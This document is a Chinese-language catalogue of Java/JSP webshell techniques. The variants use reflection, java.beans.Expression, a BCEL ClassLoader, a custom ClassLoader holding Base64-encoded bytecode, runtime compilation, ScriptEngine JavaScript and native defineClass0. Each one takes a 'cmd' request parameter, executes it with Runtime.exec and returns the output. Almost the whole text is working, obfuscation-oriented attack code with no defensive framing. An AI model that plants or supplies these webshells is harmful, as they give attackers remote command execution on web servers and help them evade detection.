通过反射
Class clazz = Class.forName("java.lang.Runtime");
Method getRuntime = clazz.getMethod("getRuntime");
Method method = clazz.getMethod("exec",String.class);
Process process = (Process) method.invoke(getRuntime.invoke(null),request.getParameter("cmd"));
InputStream in = process.getInputStream();
InputStreamReader inputStreamReader = new InputStreamReader(in);
BufferedReader bufferedReader = new BufferedReader(inputStreamReader);
String s = null;
response.getWriter().write("<pre>");
while((s=bufferedReader.readLine())!=null){
response.getWriter().write(s);
}
response.getWriter().write("</pre>");
BeansExpression
String cmd = request.getParameter("cmd");
Expression expression = new Expression(Runtime.getRuntime(),"exec",new Object[]{cmd});
Process process = (Process) expression.getValue();
InputStreamReader inputStreamReader = new InputStreamReader(process.getInputStream());
BufferedReader bf = new BufferedReader(inputStreamReader);
String s = "";
response.getWriter().write("<pre>");
while((s=bf.readLine())!=null)
{
response.getWriter().write(s);
}
response.getWriter().write("</pre>");
他的getValue方法会调用Runtime.getRuntime().exec(cmd)
BCEL ClassLoader
先写一个Evil.java,将其编译为class文件,然后转成BCEL
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
public class Evil {
String res;
public Evil(String cmd) throws IOException {
StringBuilder sb = new StringBuilder();
BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));
String s = "";
while((s=bufferedReader.readLine())!=null){
sb.append(s).append("\n");
}
this.res = sb.toString();
}
@Override
public String toString()
{
return res;
}
}
import com.sun.org.apache.bcel.internal.classfile.Utility;
import java.io.IOException;
import java.net.URI;
import java.net.URISyntaxException;
import java.nio.file.Files;
import java.nio.file.Paths;
public class Util {
public static void main(String[] args) throws URISyntaxException, IOException {
URI uri = Util.class.getResource("Evil.class").toURI();
byte[] bytes = Files.readAllBytes(Paths.get(uri));
System.out.println("$$BCEL$$" + Utility.encode(bytes,true));
}
}
String cmd = request.getParameter("cmd");
String bcel = "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$85T$dbR$TA$Q$3d$93l2$9be$b9$F$c2$c5$3b$w$90$84KT$bc$C$C$GA$81p$v$b0$b0$f2$b8$d9$M$b8$98$ec$a66$h$8a$3f$f2U$ab4$b1$a4$caG$l$fc$C$bf$c1$8f$Q$7b6$e1$92$o$96$P$db$3d$d3$dd$d3$7d$faL$cf$fe$fc$f3$ed$3b$80$87$d8$d2$Q$c5$E$c7$a4$86$80$d4$v$8e$7b$g$ee$e3$81$US$gE$3c$d2$Q$c2c$N$K$9e$a8x$w$f53$Z$3b$adbF$ea$d9$I$ba$f1$9cc$8ec$9e$n$e8$8a2C4s$60$i$g$a9$82a$ef$a7v$3c$d7$b2$f7g$Y$c2$b3$96mys$M$b1$f8ewb$97AYt$f2$82$a13c$d9b$a3R$cc$J$f7$8d$91$x$I$99$ce1$8d$c2$ae$e1Zr$df0$w$de$3b$8bJ$853K$87V$81$d2$H$cdb$9e$nP$ce1$M$5e$ca$9f$aeX$85$bcp$v$ac$pW$d9$db$T$ae$c8o$L$83$y$M$D$f5$60$cbI$a5$9b$3c$U$cb$u$7f$fb$8eg$98$ef$d7$8d$92_$d6os$81$d8$o$a2$Y$b4$a5$pS$94$3c$cb$b1$cb$i$_$YT$cf$a9$97c$e8$8d$tZq$a0$ed8$V$d7$U$cb$96$ec$m$o$91O$ca$u$j1$a4$Z$fa$ff$B$9b$a1$af5Fj$f5$d4$b1b$97$w$k$9d$SF$b1$ee$e3X$d4$f1$SK$3a$96$f1$8a$e3$b5$8e$V$ac$caBkRd$Y$a0c$jI$j$h$d8$a4V5$j$J$b9$ebA$_q$x$911t$9d$e3$d9$cc$j$I$d3k2$9d$b6$das$Ga$f3$8c$P$ba$8e$b8$bc$d2$ee$f3$f0$ed$8a$edYEj$5b$db$X$de$d9$s$d6$c4S$c3LD$v$e2H$98$M$a3$adF$e5$82i$cbuLQ$$$cf4Uj$Y$e9$ae$a9$d2$F$5e$88$e0$d3j$cd$84$d1$f1$81xK$87$ec$a1$e7$dc$d5$98$MiU$c9$9f$97$93J$ph$94J$c2$a6$e1$9b$f8$P$da$e6Y$c4$Q$3d$9c$u$3dB$ba$KI$3b$c9$A$adc$e8$p$ddO$bb_$I$d3$cb$D$d6$925$b0c$E$b25$E$d7$8f$a1d$8f$R$ca$7eEx$ac$K$5e$85ZC$a4$Gm$p$da6$adLT$a1g$a7$95$l$88$8e$P$wU$b4G$3bH$bc$fdp$f2$3b9$5eE$e7$Xt$7d$a2tA$M$90$bc$N$95$q$a7$d7$ac$d2$mD0$M$8d$G$a0$NS$b4K$a3$D$ab$e8$c4$a0$ff$87$f0$n$e0$K$ae$C$fe$ea$gAe$U5$8f$eb$b8AP$871$82$9b$b8Ey$T$94u$88$bc$Ki$d0$e9$c0$J$99B$iw8$eer$Ms$8c$d0$CT$7e$94$dc$K$r$89$d3GSGR$f6$9b$o$z$b9$I$r$3f$a3$eb$a3O$87D$gn$Q$q$d1$e8$f5$80$G$g$861$3fj$fc$_$3a$c0$d5$J$ce$E$A$A";
Class _loader = Class.forName("com.sun.org.apache.bcel.internal.util.ClassLoader");
ClassLoader loader = (ClassLoader) _loader.newInstance();
Class _obj = loader.loadClass(bcel);
Constructor constructor = _obj.getConstructor(String.class);
Object obj = constructor.newInstance(cmd);
response.getWriter().write(obj.toString());
自定义ClassLoader
public class Util {
public static void main(String[] args) throws URISyntaxException, IOException {
URI uri = Util.class.getResource("Evil.class").toURI();
byte[] bytes = Files.readAllBytes(Paths.get(uri));
System.out.println(Base64.getEncoder().encodeToString(bytes));
}
}
String cmd = request.getParameter("cmd");
ClassLoader loader = new ClassLoader() {
@Override
public Class<?> loadClass(String name) throws ClassNotFoundException {
if(name.contains("Evil")){
return findClass(name);
}
return super.loadClass(name);
}
@Override
protected Class<?> findClass(String name) throws ClassNotFoundException {
byte[] code = Base64.getDecoder().decode("yv66vgAAADQAUAoAEgAtBwAuCgACAC0HAC8HADAKADEAMgoAMQAzCgA0ADUKAAUANgoABAA3CAA4CgAEADkKAAIAOggAOwoAAgA8CQARAD0HAD4HAD8BAANyZXMBABJMamF2YS9sYW5nL1N0cmluZzsBAAY8aW5pdD4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEABkxFdmlsOwEAA2NtZAEAAnNiAQAZTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwEADmJ1ZmZlcmVkUmVhZGVyAQAYTGphdmEvaW8vQnVmZmVyZWRSZWFkZXI7AQABcwEADVN0YWNrTWFwVGFibGUHAD4HAEAHAC4HAC8BAApFeGNlcHRpb25zBwBBAQAIdG9TdHJpbmcBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAAlFdmlsLmphdmEMABUAQgEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyAQAWamF2YS9pby9CdWZmZXJlZFJlYWRlcgEAGWphdmEvaW8vSW5wdXRTdHJlYW1SZWFkZXIHAEMMAEQARQwARgBHBwBIDABJAEoMABUASwwAFQBMAQAADABNACoMAE4ATwEAAQoMACkAKgwAEwAUAQAERXZpbAEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQATamF2YS9pby9JT0V4Y2VwdGlvbgEAAygpVgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYBABMoTGphdmEvaW8vUmVhZGVyOylWAQAIcmVhZExpbmUBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsAIQARABIAAAABAAAAEwAUAAAAAgABABUAFgACABcAAADYAAYABQAAAEsqtwABuwACWbcAA027AARZuwAFWbgABiu2AAe2AAi3AAm3AApOEgs6BC22AAxZOgTGABIsGQS2AA0SDrYADVen/+oqLLYAD7UAELEAAAADABgAAAAiAAgAAAAHAAQACAAMAAkAJQAKACkACwAzAAwAQgAOAEoADwAZAAAANAAFAAAASwAaABsAAAAAAEsAHAAUAAEADAA/AB0AHgACACUAJgAfACAAAwApACIAIQAUAAQAIgAAABkAAv8AKQAFBwAjBwAkBwAlBwAmBwAkAAAYACcAAAAEAAEAKAABACkAKgABABcAAAAvAAEAAQAAAAUqtAAQsAAAAAIAGAAAAAYAAQAAABMAGQAAAAwAAQAAAAUAGgAbAAAAAQArAAAAAgAs");
return defineClass(name,code,0,code.length);
}
};
Class clazz = loader.loadClass("Evil");
Constructor constructor = clazz.getConstructor(String.class);
String res = constructor.newInstance(cmd).toString();
response.getWriter().write(res);
动态编译加载
<%@ page import="java.io.File" %>
<%@ page import="java.nio.file.Files" %>
<%@ page import="java.nio.charset.StandardCharsets" %>
<%@ page import="java.nio.file.Paths" %>
<%@ page import="java.util.Locale" %>
<%@ page import="java.nio.charset.Charset" %>
<%@ page import="javax.tools.*" %>
<%@ page import="java.net.URLClassLoader" %>
<%@ page import="java.net.URL" %>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%
String cmd = request.getParameter("cmd");
String tmppath = Files.createTempDirectory("xux").toFile().getPath();
String code = "import java.io.BufferedReader;\n" +
"import java.io.IOException;\n" +
"import java.io.InputStreamReader;\n" +
"\n" +
"public class Evil {\n" +
" String res;\n" +
" public Evil(String cmd) throws IOException {\n" +
" StringBuilder sb = new StringBuilder();\n" +
" BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));\n" +
" String s = \"\";\n" +
" while((s=bufferedReader.readLine())!=null){\n" +
" sb.append(s).append(\"\\n\");\n" +
" }\n" +
" this.res = sb.toString();\n" +
" }\n" +
" @Override\n" +
" public String toString()\n" +
" {\n" +
" return res;\n" +
" }\n" +
"}\n";
Files.write(Paths.get(tmppath + File.separator + "Evil.java"),code.getBytes(StandardCharsets.UTF_8));
JavaCompiler compiler = ToolProvider.getSystemJavaCompiler();
DiagnosticCollector diagnosticCollector = new DiagnosticCollector();
StandardJavaFileManager standardJavaFileManager = compiler.getStandardFileManager(diagnosticCollector,Locale.CHINA,Charset.forName("UTF-8"));
Iterable fileObjects = standardJavaFileManager.getJavaFileObjects(tmppath + File.separator + "Evil.java");
compiler.getTask(null,standardJavaFileManager,diagnosticCollector,null,null,fileObjects).call();
URLClassLoader urlClassLoader = new URLClassLoader(new URL[]{new URL("file:" + tmppath + File.separator)});
Class clazz = urlClassLoader.loadClass("Evil");
Constructor constructor = clazz.getConstructor(String.class);
String res = constructor.newInstance(cmd).toString();
response.getWriter().write(res);
%>
ScriptEngine执行JS
<%@ page import="javax.script.ScriptEngineManager" %>
<%@ page import="javax.script.ScriptEngine" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.nio.ByteBuffer" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%
String jspcode = "function evil(){\n" +
" try{\n" +
" load(\"nashorn:mozilla_compat.js\");\n" +
" }catch (e) {\n" +
" \n" +
" }\n" +
" importPackage(Packages.java.lang)\n" +
" var cmd = require.getParameter(\"cmd\");\n" +
" var res = java.lang.Runtime.getRuntime().exec(cmd);\n" +
" return res.getInputStream();\n" +
"}\n" +
"evil()";
ScriptEngine engine = new ScriptEngineManager().getEngineByName("JavaScript");
engine.put("request",request);
InputStream inputStream = (InputStream) engine.eval(jspcode);
InputStreamReader inputStreamReader = new InputStreamReader(inputStream);
BufferedReader bufferedReader = new BufferedReader(inputStreamReader);
String res = "";
response.getWriter().write("<pre>");
while((res=bufferedReader.readLine())!=null){
response.getWriter().write(res);
}
response.getWriter().write("</pre>");
%>
通过native方法defineClass0
ClassLoader classLoader = ClassLoader.getSystemClassLoader();
String cmd = request.getParameter("cmd");
byte[] code = Base64.getDecoder().decode("yv66vgAAADQAUAoAEgAtBwAuCgACAC0HAC8HADAKADEAMgoAMQAzCgA0ADUKAAUANgoABAA3CAA4CgAEADkKAAIAOggAOwoAAgA8CQARAD0HAD4HAD8BAANyZXMBABJMamF2YS9sYW5nL1N0cmluZzsBAAY8aW5pdD4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEABkxFdmlsOwEAA2NtZAEAAnNiAQAZTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwEADmJ1ZmZlcmVkUmVhZGVyAQAYTGphdmEvaW8vQnVmZmVyZWRSZWFkZXI7AQABcwEADVN0YWNrTWFwVGFibGUHAD4HAEAHAC4HAC8BAApFeGNlcHRpb25zBwBBAQAIdG9TdHJpbmcBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAAlFdmlsLmphdmEMABUAQgEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyAQAWamF2YS9pby9CdWZmZXJlZFJlYWRlcgEAGWphdmEvaW8vSW5wdXRTdHJlYW1SZWFkZXIHAEMMAEQARQwARgBHBwBIDABJAEoMABUASwwAFQBMAQAADABNACoMAE4ATwEAAQoMACkAKgwAEwAUAQAERXZpbAEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQATamF2YS9pby9JT0V4Y2VwdGlvbgEAAygpVgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYBABMoTGphdmEvaW8vUmVhZGVyOylWAQAIcmVhZExpbmUBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsAIQARABIAAAABAAAAEwAUAAAAAgABABUAFgACABcAAADYAAYABQAAAEsqtwABuwACWbcAA027AARZuwAFWbgABiu2AAe2AAi3AAm3AApOEgs6BC22AAxZOgTGABIsGQS2AA0SDrYADVen/+oqLLYAD7UAELEAAAADABgAAAAiAAgAAAAHAAQACAAMAAkAJQAKACkACwAzAAwAQgAOAEoADwAZAAAANAAFAAAASwAaABsAAAAAAEsAHAAUAAEADAA/AB0AHgACACUAJgAfACAAAwApACIAIQAUAAQAIgAAABkAAv8AKQAFBwAjBwAkBwAlBwAmBwAkAAAYACcAAAAEAAEAKAABACkAKgABABcAAAAvAAEAAQAAAAUqtAAQsAAAAAIAGAAAAAYAAQAAABMAGQAAAAwAAQAAAAUAGgAbAAAAAQArAAAAAgAs");
Method method = ClassLoader.class.getDeclaredMethod("defineClass0",
String.class,byte[].class,int.class,int.class, ProtectionDomain.class);
method.setAccessible(true);
Class clazz = (Class) method.invoke(classLoader,"Evil",code,0,code.length,null);
Constructor constructor = clazz.getConstructor(String.class);
response.getWriter().write(constructor.newInstance(cmd).toString());